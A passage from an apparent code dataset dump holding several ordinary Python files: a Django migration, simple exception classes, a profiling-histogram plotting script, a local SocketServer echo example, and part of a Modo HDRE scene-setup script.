name='BrandTextEN',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('meta_title', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Title')),
('meta_description', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Description')),
('description_short', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description short')),
('description_long', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description long')),
('slug', models.CharField(max_length=250, unique=True, verbose_name='Slug')),
('name', models.CharField(blank=True, max_length=250, null=True, verbose_name='Name')),
('public', models.BooleanField(default=False, verbose_name='Public')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='BrandTextES',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('meta_title', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Title')),
('meta_description', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Description')),
('description_short', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description short')),
('description_long', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description long')),
('slug', models.CharField(max_length=250, unique=True, verbose_name='Slug')),
('name', models.CharField(blank=True, max_length=250, null=True, verbose_name='Name')),
('public', models.BooleanField(default=False, verbose_name='Public')),
],
options={
'abstract': False,
},
),
migrations.RemoveField(
model_name='brand',
name='name',
),
migrations.RemoveField(
model_name='brand',
name='slug',
),
migrations.AddField(
model_name='brandtextes',
name='brand',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_products.Brand'),
),
migrations.AddField(
model_name='brandtexten',
name='brand',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_products.Brand'),
),
]
|
normal
|
{
"blob_id": "0aed35827e6579f7a9434d252d0b9150ab24adf9",
"index": 4573,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('codenerix_products', '0005_remove_product_name')]\n operations = [migrations.CreateModel(name='BrandTextEN', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('created', models.DateTimeField(\n auto_now_add=True, verbose_name='Created')), ('updated', models.\n DateTimeField(auto_now=True, verbose_name='Updated')), (\n 'meta_title', models.CharField(blank=True, max_length=70, null=True,\n verbose_name='Meta Title')), ('meta_description', models.CharField(\n blank=True, max_length=70, null=True, verbose_name=\n 'Meta Description')), ('description_short', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description short')), ('description_long', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description long')), ('slug', models.CharField(max_length=250,\n unique=True, verbose_name='Slug')), ('name', models.CharField(blank\n =True, max_length=250, null=True, verbose_name='Name')), ('public',\n models.BooleanField(default=False, verbose_name='Public'))],\n options={'abstract': False}), migrations.CreateModel(name=\n 'BrandTextES', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('created',\n models.DateTimeField(auto_now_add=True, verbose_name='Created')), (\n 'updated', models.DateTimeField(auto_now=True, verbose_name=\n 'Updated')), ('meta_title', models.CharField(blank=True, max_length\n =70, null=True, verbose_name='Meta Title')), ('meta_description',\n models.CharField(blank=True, max_length=70, null=True, verbose_name\n ='Meta Description')), ('description_short', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description short')), ('description_long', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description long')), ('slug', models.CharField(max_length=250,\n unique=True, verbose_name='Slug')), ('name', models.CharField(blank\n =True, max_length=250, null=True, verbose_name='Name')), ('public',\n models.BooleanField(default=False, verbose_name='Public'))],\n options={'abstract': False}), migrations.RemoveField(model_name=\n 'brand', name='name'), migrations.RemoveField(model_name='brand',\n name='slug'), migrations.AddField(model_name='brandtextes', name=\n 'brand', field=models.OneToOneField(on_delete=django.db.models.\n deletion.CASCADE, related_name='es', to='codenerix_products.Brand')\n ), migrations.AddField(model_name='brandtexten', name='brand',\n field=models.OneToOneField(on_delete=django.db.models.deletion.\n CASCADE, related_name='en', to='codenerix_products.Brand'))]\n",
"step-4": "from __future__ import unicode_literals\nimport codenerix.fields\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('codenerix_products', '0005_remove_product_name')]\n operations = [migrations.CreateModel(name='BrandTextEN', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('created', models.DateTimeField(\n auto_now_add=True, verbose_name='Created')), ('updated', models.\n DateTimeField(auto_now=True, verbose_name='Updated')), (\n 'meta_title', models.CharField(blank=True, max_length=70, null=True,\n verbose_name='Meta Title')), ('meta_description', models.CharField(\n blank=True, max_length=70, null=True, verbose_name=\n 'Meta Description')), ('description_short', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description short')), ('description_long', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description long')), ('slug', models.CharField(max_length=250,\n unique=True, verbose_name='Slug')), ('name', models.CharField(blank\n =True, max_length=250, null=True, verbose_name='Name')), ('public',\n models.BooleanField(default=False, verbose_name='Public'))],\n options={'abstract': False}), migrations.CreateModel(name=\n 'BrandTextES', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('created',\n models.DateTimeField(auto_now_add=True, verbose_name='Created')), (\n 'updated', models.DateTimeField(auto_now=True, verbose_name=\n 'Updated')), ('meta_title', models.CharField(blank=True, max_length\n =70, null=True, verbose_name='Meta Title')), ('meta_description',\n models.CharField(blank=True, max_length=70, null=True, verbose_name\n ='Meta Description')), ('description_short', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description short')), ('description_long', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description long')), ('slug', models.CharField(max_length=250,\n unique=True, verbose_name='Slug')), ('name', models.CharField(blank\n =True, max_length=250, null=True, verbose_name='Name')), ('public',\n models.BooleanField(default=False, verbose_name='Public'))],\n options={'abstract': False}), migrations.RemoveField(model_name=\n 'brand', name='name'), migrations.RemoveField(model_name='brand',\n name='slug'), migrations.AddField(model_name='brandtextes', name=\n 'brand', field=models.OneToOneField(on_delete=django.db.models.\n deletion.CASCADE, related_name='es', to='codenerix_products.Brand')\n ), migrations.AddField(model_name='brandtexten', name='brand',\n field=models.OneToOneField(on_delete=django.db.models.deletion.\n CASCADE, related_name='en', to='codenerix_products.Brand'))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.5 on 2017-03-31 07:54\nfrom __future__ import unicode_literals\n\nimport codenerix.fields\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('codenerix_products', '0005_remove_product_name'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='BrandTextEN',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),\n ('meta_title', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Title')),\n ('meta_description', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Description')),\n ('description_short', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description short')),\n ('description_long', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description long')),\n ('slug', models.CharField(max_length=250, unique=True, verbose_name='Slug')),\n ('name', models.CharField(blank=True, max_length=250, null=True, verbose_name='Name')),\n ('public', models.BooleanField(default=False, verbose_name='Public')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='BrandTextES',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),\n ('meta_title', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Title')),\n ('meta_description', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Description')),\n ('description_short', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description short')),\n ('description_long', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description long')),\n ('slug', models.CharField(max_length=250, unique=True, verbose_name='Slug')),\n ('name', models.CharField(blank=True, max_length=250, null=True, verbose_name='Name')),\n ('public', models.BooleanField(default=False, verbose_name='Public')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.RemoveField(\n model_name='brand',\n name='name',\n ),\n migrations.RemoveField(\n model_name='brand',\n name='slug',\n ),\n migrations.AddField(\n model_name='brandtextes',\n name='brand',\n field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_products.Brand'),\n ),\n migrations.AddField(\n model_name='brandtexten',\n name='brand',\n field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_products.Brand'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from compas.geometry import Frame
|
normal
|
{
"blob_id": "d4e3751b2d4796c72be497007fe4c7d8ca67e18e",
"index": 6874,
"step-1": "<mask token>\n",
"step-2": "from compas.geometry import Frame\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
class Error(Exception):
pass
class TunnelInstanceError(Error):
def __init__(self, expression, message):
self.expression = expression
self.message = message
class TunnelManagerError(Error):
def __init__(self, expression, message):
self.expression = expression
self.message = message
|
normal
|
{
"blob_id": "661b622708692bd9cd1b3399835f332c86e39bf6",
"index": 8835,
"step-1": "<mask token>\n\n\nclass TunnelManagerError(Error):\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TunnelManagerError(Error):\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n",
"step-3": "<mask token>\n\n\nclass TunnelInstanceError(Error):\n <mask token>\n\n\nclass TunnelManagerError(Error):\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n",
"step-4": "<mask token>\n\n\nclass TunnelInstanceError(Error):\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n\n\nclass TunnelManagerError(Error):\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n",
"step-5": "class Error(Exception):\n pass\n\n\nclass TunnelInstanceError(Error):\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n\n\nclass TunnelManagerError(Error):\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# dg_kernel plots
import os
import re
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
import csv
import sys
NE_SIZE = 128
TITLE_SIZE = 35
TEXT_SIZE = 30
MARKER_SIZE = 10
LINE_WIDTH = 5
colors = { idx:cname for idx, cname in enumerate(mcolors.cnames) }
eventname = 'L1_DCM'
callstacklevel = 7
FREQ_THRESHOLD = 0.02
ROOT = '/global/homes/g/grnydawn/trepo/temp/cylcworkspace/extrae_HSW/cgroup/folding/02242017_1353/codeline'
# read histogram file
def read_histogram(histofile):
histodict = {}
with open(histofile, 'rb') as f:
reader = csv.reader(f, delimiter='\t')
try:
exclude_item = []
for i, row in enumerate(reader):
if len(row)<1: continue
if i==0:
name = []
for j, item in enumerate(row[1:]):
if len(item)<1:
exclude_item += [ j ]
continue
name += [ item ]
histodict['Head'] = name
else:
numval = []
for j, item in enumerate(row[1:]):
if j in exclude_item: continue
try:
numval += [ float(item) ]
except Exception as e:
if len(item)<1:
numval += [ 0.0 ]
else:
print e
histodict[row[0]] = numval
except csv.Error as e:
sys.exit('file %s, line %d: %s' % (histofile, reader.line_num, e))
return histodict
def draw_histogram(xname, yval, title, xlabel, ylabel, filename, xrange=None):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_title(title, fontsize=TITLE_SIZE)
ax.set_xlabel(xlabel, fontsize=TEXT_SIZE)
ax.set_ylabel(ylabel, fontsize=TEXT_SIZE)
if xrange: XL = xrange
else: XL = [0, len(xname)]
ax.set_xticks(range(len(xname)))
newname = []
for i, xn in enumerate(xname):
if i%1==0:
newname += [ xn ]
else:
newname += [ "" ]
ax.set_xticklabels(newname)
xval = np.arange(len(xname))[XL[0]:XL[1]]
yval = yval[XL[0]:XL[1]]
YL = [0, max(yval)*1.5]
ax.axis(XL + YL)
gridlines = ax.get_xaxis().get_gridlines()
for gl in gridlines:
gl.set_visible(False)
ax.grid(b=True, which='major', color='b', linestyle='-', linewidth=0.5)
ax.grid(b=False, which='minor', color='#888888', linestyle='-',linewidth=0.5)
ax.grid(True)
for label in ax.xaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)
#for label in ax.xaxis.get_ticklabels(): label.set_fontsize(20)
for label in ax.yaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)
fnamelist = list(set(filename))
clist = []
for fname in filename:
color = colors[fnamelist.index(fname)]
clist += [ color ]
width = (XL[1]-XL[0])/float(len(xval)*2)
histo = ax.bar(xval-width/2, yval, width, color=clist)
dummy_bars = []
for i, fname in enumerate(fnamelist):
dummy_bars += ax.bar([0], [1.E-16], width, color=colors[i])
ax.legend(dummy_bars, fnamelist, loc=2)
#plt.savefig("./dgomp.png")
plt.show()
peak1 = read_histogram('%s/%s_high_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))
peak2 = read_histogram('%s/%s_high_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))
peaks_avgsum = sum(peak1['Average']) + sum(peak2['Average'])
#print 'peaks_avgsum = ', peaks_avgsum
peaks_normavg = {}
for i, line in enumerate(peak1['Head']):
if peaks_normavg.has_key(line):
peaks_normavg[line] += peak1['Average'][i]
else:
peaks_normavg[line] = peak1['Average'][i]
for i, line in enumerate(peak2['Head']):
if peaks_normavg.has_key(line):
peaks_normavg[line] += peak2['Average'][i]
else:
peaks_normavg[line] = peak2['Average'][i]
#print 'peaks_normavg before = ', peaks_normavg.values()[:30]
for line in peaks_normavg.keys():
peaks_normavg[line] = peaks_normavg[line]/peaks_avgsum
#print 'peaks_normavg after = ', peaks_normavg.values()[:30]
nonpeak1 = read_histogram('%s/%s_low_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))
nonpeak2 = read_histogram('%s/%s_low_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))
nonpeaks_avgsum = sum(nonpeak1['Average']) + sum(nonpeak2['Average'])
nonpeaks_normavg = {}
for i, line in enumerate(nonpeak1['Head']):
if nonpeaks_normavg.has_key(line):
nonpeaks_normavg[line] += nonpeak1['Average'][i]
else:
nonpeaks_normavg[line] = nonpeak1['Average'][i]
for i, line in enumerate(nonpeak2['Head']):
if nonpeaks_normavg.has_key(line):
nonpeaks_normavg[line] += nonpeak2['Average'][i]
else:
nonpeaks_normavg[line] = nonpeak2['Average'][i]
#print 'nonpeaks_normavg before = ', nonpeaks_normavg.values()[:30]
for line in nonpeaks_normavg.keys():
nonpeaks_normavg[line] = nonpeaks_normavg[line]/nonpeaks_avgsum
#print 'nonpeaks_normavg after = ', nonpeaks_normavg.values()[:30]
#import pdb; pdb.set_trace()
result = {}
for line, bursts in peaks_normavg.iteritems():
result[line] = bursts
for line, bursts in nonpeaks_normavg.iteritems():
if result.has_key(line):
result[line] -= bursts
else:
result[line] = -1.0*bursts
xlinenum = []
ybursts = []
filename = []
for line, bursts in result.iteritems():
if bursts>FREQ_THRESHOLD:
match = re.search(r'\s*(\d+)\s+\((.*)\)', line)
if match:
xlinenum += [ match.group(1) ]
ybursts += [ float(bursts) ]
matchfname = re.search(r'(\b\w+\.[cFf][\d]*\,)', match.group(2))
if matchfname is None:
fname = 'Unresolved'
else:
fname = matchfname.group(1)[:-1]
filename += [ fname ]
zipped = zip(xlinenum, ybursts, filename)
zipped.sort()
xlinenum, ybursts, filename = zip(*zipped)
#title = 'Frequent source lines in a region of interest'
title = 'Frequent source lines at high %s regions in callstack level %d'%(eventname, callstacklevel)
xlabel = 'Sampled function line number'
ylabel = 'Normalized frequency'
draw_histogram(xlinenum, np.array(ybursts), title, xlabel, ylabel, filename)
|
normal
|
{
"blob_id": "872b13a93c9aba55c143ee9891543f059c070a36",
"index": 4631,
"step-1": "# dg_kernel plots\n\nimport os\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport csv\nimport sys\n\nNE_SIZE = 128\nTITLE_SIZE = 35 \nTEXT_SIZE = 30 \nMARKER_SIZE = 10\nLINE_WIDTH = 5\ncolors = { idx:cname for idx, cname in enumerate(mcolors.cnames) }\n\neventname = 'L1_DCM'\ncallstacklevel = 7\n\nFREQ_THRESHOLD = 0.02\n\nROOT = '/global/homes/g/grnydawn/trepo/temp/cylcworkspace/extrae_HSW/cgroup/folding/02242017_1353/codeline'\n\n# read histogram file\ndef read_histogram(histofile):\n histodict = {}\n with open(histofile, 'rb') as f:\n reader = csv.reader(f, delimiter='\\t')\n try:\n exclude_item = []\n for i, row in enumerate(reader):\n if len(row)<1: continue\n if i==0:\n name = []\n for j, item in enumerate(row[1:]):\n if len(item)<1:\n exclude_item += [ j ]\n continue\n name += [ item ]\n histodict['Head'] = name\n else:\n numval = []\n for j, item in enumerate(row[1:]):\n if j in exclude_item: continue\n try:\n numval += [ float(item) ]\n except Exception as e:\n if len(item)<1:\n numval += [ 0.0 ]\n else:\n print e\n histodict[row[0]] = numval\n except csv.Error as e:\n sys.exit('file %s, line %d: %s' % (histofile, reader.line_num, e))\n\n return histodict\n\ndef draw_histogram(xname, yval, title, xlabel, ylabel, filename, xrange=None):\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n ax.set_title(title, fontsize=TITLE_SIZE)\n ax.set_xlabel(xlabel, fontsize=TEXT_SIZE)\n ax.set_ylabel(ylabel, fontsize=TEXT_SIZE)\n\n if xrange: XL = xrange\n else: XL = [0, len(xname)]\n\n ax.set_xticks(range(len(xname)))\n newname = []\n for i, xn in enumerate(xname):\n if i%1==0:\n newname += [ xn ]\n else:\n newname += [ \"\" ]\n ax.set_xticklabels(newname)\n\n xval = np.arange(len(xname))[XL[0]:XL[1]] \n yval = yval[XL[0]:XL[1]] \n\n YL = [0, max(yval)*1.5]\n ax.axis(XL + YL)\n\n gridlines = ax.get_xaxis().get_gridlines()\n for gl in gridlines:\n gl.set_visible(False)\n\n ax.grid(b=True, which='major', color='b', linestyle='-', linewidth=0.5)\n ax.grid(b=False, which='minor', color='#888888', linestyle='-',linewidth=0.5)\n ax.grid(True)\n\n for label in ax.xaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)\n #for label in ax.xaxis.get_ticklabels(): label.set_fontsize(20)\n for label in ax.yaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)\n\n fnamelist = list(set(filename))\n clist = []\n for fname in filename:\n color = colors[fnamelist.index(fname)]\n clist += [ color ]\n\n width = (XL[1]-XL[0])/float(len(xval)*2)\n histo = ax.bar(xval-width/2, yval, width, color=clist)\n\n dummy_bars = []\n for i, fname in enumerate(fnamelist):\n dummy_bars += ax.bar([0], [1.E-16], width, color=colors[i])\n\n ax.legend(dummy_bars, fnamelist, loc=2)\n #plt.savefig(\"./dgomp.png\")\n plt.show() \n\npeak1 = read_histogram('%s/%s_high_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))\npeak2 = read_histogram('%s/%s_high_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))\n\npeaks_avgsum = sum(peak1['Average']) + sum(peak2['Average'])\n#print 'peaks_avgsum = ', peaks_avgsum\n\npeaks_normavg = {}\n\nfor i, line in enumerate(peak1['Head']):\n if peaks_normavg.has_key(line):\n peaks_normavg[line] += peak1['Average'][i]\n else:\n peaks_normavg[line] = peak1['Average'][i]\nfor i, line in enumerate(peak2['Head']):\n if peaks_normavg.has_key(line):\n peaks_normavg[line] += peak2['Average'][i]\n else:\n peaks_normavg[line] = peak2['Average'][i]\n\n#print 'peaks_normavg before = ', peaks_normavg.values()[:30]\nfor line in peaks_normavg.keys():\n peaks_normavg[line] = peaks_normavg[line]/peaks_avgsum\n#print 'peaks_normavg after = ', peaks_normavg.values()[:30]\n\n\nnonpeak1 = read_histogram('%s/%s_low_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))\nnonpeak2 = read_histogram('%s/%s_low_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))\n\nnonpeaks_avgsum = sum(nonpeak1['Average']) + sum(nonpeak2['Average'])\n\nnonpeaks_normavg = {}\n\nfor i, line in enumerate(nonpeak1['Head']):\n if nonpeaks_normavg.has_key(line):\n nonpeaks_normavg[line] += nonpeak1['Average'][i]\n else:\n nonpeaks_normavg[line] = nonpeak1['Average'][i]\nfor i, line in enumerate(nonpeak2['Head']):\n if nonpeaks_normavg.has_key(line):\n nonpeaks_normavg[line] += nonpeak2['Average'][i]\n else:\n nonpeaks_normavg[line] = nonpeak2['Average'][i]\n\n#print 'nonpeaks_normavg before = ', nonpeaks_normavg.values()[:30]\nfor line in nonpeaks_normavg.keys():\n nonpeaks_normavg[line] = nonpeaks_normavg[line]/nonpeaks_avgsum\n#print 'nonpeaks_normavg after = ', nonpeaks_normavg.values()[:30]\n\n#import pdb; pdb.set_trace()\n\nresult = {}\nfor line, bursts in peaks_normavg.iteritems():\n result[line] = bursts\nfor line, bursts in nonpeaks_normavg.iteritems():\n if result.has_key(line):\n result[line] -= bursts\n else:\n result[line] = -1.0*bursts\n\nxlinenum = []\nybursts = []\nfilename = []\nfor line, bursts in result.iteritems():\n if bursts>FREQ_THRESHOLD:\n match = re.search(r'\\s*(\\d+)\\s+\\((.*)\\)', line)\n if match:\n xlinenum += [ match.group(1) ]\n ybursts += [ float(bursts) ]\n matchfname = re.search(r'(\\b\\w+\\.[cFf][\\d]*\\,)', match.group(2))\n if matchfname is None: \n fname = 'Unresolved'\n else:\n fname = matchfname.group(1)[:-1]\n filename += [ fname ]\n \nzipped = zip(xlinenum, ybursts, filename)\nzipped.sort()\nxlinenum, ybursts, filename = zip(*zipped)\n#title = 'Frequent source lines in a region of interest' \ntitle = 'Frequent source lines at high %s regions in callstack level %d'%(eventname, callstacklevel)\nxlabel = 'Sampled function line number'\nylabel = 'Normalized frequency'\n\ndraw_histogram(xlinenum, np.array(ybursts), title, xlabel, ylabel, filename)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python
# coding:utf-8
import time
from SocketServer import (TCPServer as TCP,
StreamRequestHandler as SRH)
HOST = '127.0.0.1'
PORT = 8888
BUFSIZE = 1024
ADDR = (HOST, PORT)
class MyRequestHandler(SRH):
def handle(self):
print '...connected from :', self.client_address
self.wfile.write('[%s] %s' % (time.ctime(),
self.rfile.readline()))
tcpServ = TCP(ADDR, MyRequestHandler)
print 'waiting for connection...'
tcpServ.serve_forever( )
|
normal
|
{
"blob_id": "377143635939cf113e4188b5c4f55cec068a17b1",
"index": 4171,
"step-1": "#!/usr/bin/env python\n# coding:utf-8\nimport time\nfrom SocketServer import (TCPServer as TCP,\n StreamRequestHandler as SRH)\n\nHOST = '127.0.0.1'\nPORT = 8888\nBUFSIZE = 1024\nADDR = (HOST, PORT)\n\nclass MyRequestHandler(SRH):\n def handle(self):\n print '...connected from :', self.client_address\n self.wfile.write('[%s] %s' % (time.ctime(), \n self.rfile.readline()))\n \ntcpServ = TCP(ADDR, MyRequestHandler)\nprint 'waiting for connection...'\ntcpServ.serve_forever( )",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python
################################################################################
#
# HDREEnable.py
#
# Version: 1.000
#
# Author: Gwynne Reddick
#
# Description:
#
#
# Usage:
#
# Last Update 16:49 08/12/10
#
################################################################################
# part of a hack for later on so we can identify if a second HDRE assembly has been applied
camnames = {'HDRECam (2)':' (2)',
'HDRECam(2)':'(2)',
'HDRECam 2':' 2',
'HDRECam_2':'_2',
'HDRECam2':'2'}
HDREEnvs = ['HDRERefl', 'HDREBackplate', 'HDREEnv']
def itemexists(name):
lx.eval('select.item {%s} set' % name)
selected = lx.evalN('item.name ?')
return name in selected
def lockcamera():
if not itemexists('HDRECam_Grp'):
lx.eval('select.drop item')
lx.eval('group.create')
lx.eval('item.name HDRECam_Grp')
lx.eval('select.subItem HDRECam set camera')
lx.eval('!!group.edit add item')
lx.eval('select.item HDRECam_Grp set')
lx.eval('item.channel lock on item:HDRECam_Grp')
def lockanimcamera():
if not itemexists('HDRECamAnimate_Grp'):
lx.eval('select.drop item')
lx.eval('group.create')
lx.eval('item.name HDRECamAnimate_Grp')
xfrmitem = lx.eval('query sceneservice item.xfrmPos ? HDRECamAnimate')
lx.eval('select.channel {%s:pos.X} set' % xfrmitem)
lx.eval('select.channel {%s:pos.Y} add' % xfrmitem)
lx.eval('select.channel {%s:pos.Z} add' % xfrmitem)
lx.eval('!!group.edit add chan')
lx.eval('item.channel lock on item:HDRECamAnimate_Grp')
def hastag(item):
lx.eval('select.drop item')
lx.eval('select.item {%s} set' % item)
if lx.eval('item.tag HDRE ?') == 'set':
return true
def clearold():
try:
numenvs = lx.eval('query sceneservice environment.N ? all')
envs = []
oldclips = []
for x in xrange(numenvs):
envs.append(lx.eval('query sceneservice environment.ID ? %s' % x))
# need a hack here to work round what appears to be a bug. We need to collect a
# list of clips to delete after deleting the env items. For some reason we have
# to collect the list in one loop, then delete the env items in a second loop
# otherwise querying the env refl image returns None. I think this is because the
# env image layer is originally an instance
for env in envs:
lx.eval('select.item %s set' % env)
if lx.eval('item.tag string HDRE ?') == 'set':
layer, process = lx.eval('query sceneservice mask.children ? {%s}' % env)
lx.eval('select.item {%s} set' % layer)
oldclips.append(lx.eval('texture.setIMap ?'))
# now delete the env items
for env in envs:
lx.eval('select.item %s set' % env)
if lx.eval('item.tag string HDRE ?') == 'set':
lx.eval('!!item.delete')
numgrplocs = lx.eval('query sceneservice groupLocator.N ? all')
grplocs = []
for x in xrange(numgrplocs):
grplocs.append(lx.eval('query sceneservice groupLocator.ID ? %s' % x))
for loc in grplocs:
lx.eval('select.item %s set' % loc)
if lx.eval('item.tag string HDRE ?') == 'set':
lx.eval('!!item.delete')
break
# clear old ground and water material groups
lx.eval('select.itemPattern HDREGroup')
id = lx.eval1('query sceneservice selection ? mask')
parent = lx.eval('query sceneservice mask.parent ? %s' % id)
lx.eval('select.item %s set' % parent)
lx.eval('texture.delete')
# clear old clips
for clip in oldclips:
lx.eval('select.drop item')
lx.eval('select.item {%s} set' % clip)
lx.eval('clip.delete')
except:
lx.out('Exception "%s" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))
def renamenew(incr):
try:
lx.eval('item.name HDRECam item:{HDRECam%s}' % incr)
lx.eval('item.name HDRECamAnimate item:{HDRECamAnimate%s}' % incr)
lx.eval('item.name HDRESun item:{HDRESun%s}' % incr)
lx.eval('item.name HDRERefl item:{HDRERefl%s}' % incr)
lx.eval('item.name HDREBackplate item:{HDREBackplate%s}' % incr)
lx.eval('item.name HDREEnv item:{HDREEnv%s}' % incr)
lx.eval('item.name {HDREActivate} item:{HDREActivate%s}' % incr)
lx.eval('item.name {HDREWater} item:{HDREWater%s}' % incr)
lx.eval('item.name {HDREShadowGround} item:{HDREShadowGround%s}' % incr)
lx.eval('item.name {HDREControls} item:{HDREControls%s}' % incr)
lx.eval('item.name {BackdropBrowser} item:{BackdropBrowser%s}' % incr)
lx.eval('item.name {Texture Group} item:{Texture Group%s}' % incr)
lx.eval('item.name {HDREGroup} item:{HDREGroup%s}' % incr)
# rename the parent group
root = lx.eval('query sceneservice item.parent ? HDRECam')
rootname = lx.eval('query sceneservice item.name ? %s' % root)
newname = rootname.split(incr)[0]
lx.eval('item.name {%s} item:{%s}' % (newname, rootname))
except:
lx.out('Exception "%s" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))
def tagitems():
try:
lx.eval('select.drop item')
for item in HDREEnvs:
lx.eval('select.item {%s} set' % item)
lx.eval('item.tag string {HDRE} {set}')
lx.eval('select.item {%s} set' % rootID)
lx.eval('item.tag string {HDRE} {set}')
except:
lx.out('Exception "%s" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))
def setframesize():
try:
backplate = None
# find the backplate
envchildren = lx.eval('query sceneservice item.children ? HDREBackplate')
for child in envchildren:
if lx.eval('query sceneservice item.type ? {%s}' % child) == 'imageMap':
lx.eval('select.item %s set' % child)
backplate = lx.eval('texture.setIMap ?')
break
if backplate:
clip_width = None
clip_height = None
# set render frame size and film back aspect aspect
clips = lx.evalN('query layerservice clips ? all')
for clip in clips:
if lx.eval('query layerservice clip.name ? {%s}' % clip) == backplate:
info = lx.eval('query layerservice clip.info ? {%s}' % clip).split()
clip_width = float(info[1].split(':')[1])
clip_height = float(info[2].split(':')[1])
if clip_width != None and clip_height != None:
if clip_width > clip_height:
frame_width = 1024
frame_height = int((clip_height/clip_width) * 1024)
else:
frame_height = 1024
